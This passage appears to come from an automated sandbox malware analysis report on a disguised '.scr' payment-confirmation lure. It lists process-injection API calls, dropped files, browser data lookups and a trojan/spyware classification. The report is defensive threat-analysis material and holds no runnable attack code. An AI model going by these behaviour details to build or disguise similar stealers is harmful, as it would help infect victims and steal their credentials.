Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00A2FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A300C4 NtCreateFile,	3_2_00A300C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30060 NtQuerySection,	3_2_00A30060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30078 NtResumeThread,	3_2_00A30078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30048 NtProtectVirtualMemory,	3_2_00A30048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A301D4 NtSetValueKey,	3_2_00A301D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3010C NtOpenDirectoryObject,	3_2_00A3010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A30C40 NtGetContextThread,	3_2_00A30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A310D0 NtOpenProcessToken,	3_2_00A310D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A31148 NtOpenThread,	3_2_00A31148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F8CC NtWaitForSingleObject,	3_2_00A2F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A31930 NtSetContextThread,	3_2_00A31930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F938 NtWriteFile,	3_2_00A2F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F900 NtReadFile,	3_2_00A2F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FAB8 NtQueryValueKey,	3_2_00A2FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FAD0 NtAllocateVirtualMemory,	3_2_00A2FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FA20 NtQueryInformationFile,	3_2_00A2FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FA50 NtEnumerateValueKey,	3_2_00A2FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FBB8 NtQueryInformationToken,	3_2_00A2FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FBE8 NtQueryVirtualMemory,	3_2_00A2FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FB50 NtCreateKey,	3_2_00A2FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC90 NtUnmapViewOfSection,	3_2_00A2FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC30 NtOpenProcess,	3_2_00A2FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC60 NtMapViewOfSection,	3_2_00A2FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FC48 NtSetInformationFile,	3_2_00A2FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A31D80 NtSuspendThread,	3_2_00A31D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FD8C NtDelayExecution,	3_2_00A2FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FD5C NtEnumerateKey,	3_2_00A2FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FEA0 NtReadVirtualMemory,	3_2_00A2FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FED0 NtAdjustPrivilegesToken,	3_2_00A2FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FE24 NtWriteVirtualMemory,	3_2_00A2FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FFB4 NtCreateSection,	3_2_00A2FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FFFC NtCreateProcessEx,	3_2_00A2FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FF34 NtQueueApcThread,	3_2_00A2FF34

Detected potential crypto function

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D0494	0_2_001D0494
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D7908	0_2_001D7908
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D8968	0_2_001D8968
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DF310	0_2_001DF310
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DF748	0_2_001DF748
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D0898	0_2_001D0898
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DFB71	0_2_001DFB71
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DFB80	0_2_001DFB80
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001DEED8	0_2_001DEED8
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_00402E34	0_2_00402E34
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_004000F0	0_2_004000F0
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D1242	0_2_001D1242
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Code function: 0_2_001D04E4	0_2_001D04E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418C73	3_2_00418C73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004014F0	3_2_004014F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004030F0	3_2_004030F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00401200	3_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00410413	3_2_00410413
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004044F7	3_2_004044F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042F4A3	3_2_0042F4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402560	3_2_00402560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E643	3_2_0040E643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00410633	3_2_00410633
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416E83	3_2_00416E83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E790	3_2_0040E790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E793	3_2_0040E793
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3E0C6	3_2_00A3E0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3E2E9	3_2_00A3E2E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE63BF	3_2_00AE63BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A663DB	3_2_00A663DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A42305	3_2_00A42305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A8A37B	3_2_00A8A37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC443E	3_2_00AC443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC05E3	3_2_00AC05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A5C5F0	3_2_00A5C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A86540	3_2_00A86540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A44680	3_2_00A44680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4E6C1	3_2_00A4E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE2622	3_2_00AE2622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A8A634	3_2_00A8A634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4C7BC	3_2_00A4C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A6286D	3_2_00A6286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4C85C	3_2_00A4C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A429B2	3_2_00A429B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE098E	3_2_00AE098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AD49F5	3_2_00AD49F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A569FE	3_2_00A569FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A8C920	3_2_00A8C920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AECBA4	3_2_00AECBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC6BCB	3_2_00AC6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE2C9C	3_2_00AE2C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACAC5E	3_2_00ACAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A70D3B	3_2_00A70D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4CD5B	3_2_00A4CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A72E2F	3_2_00A72E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A5EE4C	3_2_00A5EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ADCFB1	3_2_00ADCFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AB2FDC	3_2_00AB2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A50F3F	3_2_00A50F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A6D005	3_2_00A6D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ABD06D	3_2_00ABD06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A43040	3_2_00A43040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A5905A	3_2_00A5905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACD13F	3_2_00ACD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE1238	3_2_00AE1238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3F3CF	3_2_00A3F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A47353	3_2_00A47353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A75485	3_2_00A75485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A51489	3_2_00A51489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A7D47D	3_2_00A7D47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AE35DA	3_2_00AE35DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A4351F	3_2_00A4351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC579A	3_2_00AC579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A757C3	3_2_00A757C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AD771D	3_2_00AD771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ADF8EE	3_2_00ADF8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ABF8C4	3_2_00ABF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC394B	3_2_00AC394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AC5955	3_2_00AC5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00AF3A83	3_2_00AF3A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A3FBD7	3_2_00A3FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACDBDA	3_2_00ACDBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A67B00	3_2_00A67B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ADFDDD	3_2_00ADFDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00ACBF14	3_2_00ACBF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A6DF7C	3_2_00A6DF7C
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E95B4B	6_2_61E95B4B
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E49154	6_2_61E49154
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E42303	6_2_61E42303
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E5C4BF	6_2_61E5C4BF
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E496D7	6_2_61E496D7
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E7A6D0	6_2_61E7A6D0
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E469E8	6_2_61E469E8
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E43923	6_2_61E43923
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E398B9	6_2_61E398B9
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E30BC6	6_2_61E30BC6
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E1FA30	6_2_61E1FA30
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E4BDFA	6_2_61E4BDFA
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E26D8F	6_2_61E26D8F
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E17CC0	6_2_61E17CC0
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E35C3D	6_2_61E35C3D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E44EC4	6_2_61E44EC4

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 79F86C1EDBBC69652A03A0F5667B3985BCF1E19F16FA3B8C7934E5B97AB8586D

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A8373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A83F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A3E2A8 appears 60 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00AAF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00A3DF5C appears 137 times

PE / OLE file has an invalid certificate

Source: Payent confirmation copy 00888754087.scr

Static PE information: invalid certificate

PE file contains more sections than normal

Source: sqlite3.dll.6.dr

Static PE information: Number of sections : 18 > 10

Sample file is different than original file name gathered from version info

Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.366246314.0000000000864000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.366062823.0000000000410000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.369909193.0000000005210000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.0000000002401000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000000.342344637.0000000000348000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEVew.exe. vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.00000000025B4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Payent confirmation copy 00888754087.scr
Source: Payent confirmation copy 00888754087.scr	Binary or memory string: OriginalFilenameEVew.exe. vs Payent confirmation copy 00888754087.scr

Searches the installation path of Mozilla Firefox

Source: C:\Windows\SysWOW64\finger.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Uses 32bit PE files

Source: Payent confirmation copy 00888754087.scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payent confirmation copy 00888754087.scr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, iCErSCKyoG3WA92F9d.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.5210000.6.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payent confirmation copy 00888754087.scr.3680078.3.raw.unpack, gdALg5DWZcE17EVr1l.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winSCR@9/8@20/12

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\11v105ky.cvg.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n..........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(....... .......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................0..........................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................>..........................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....S..........................s............(.......$.......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P............................._..........................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................q..........................s............................x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................l.......x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............(...............x...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............(...............x...............	Jump to behavior

Source: Payent confirmation copy 00888754087.scr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payent confirmation copy 00888754087.scr

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\finger.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
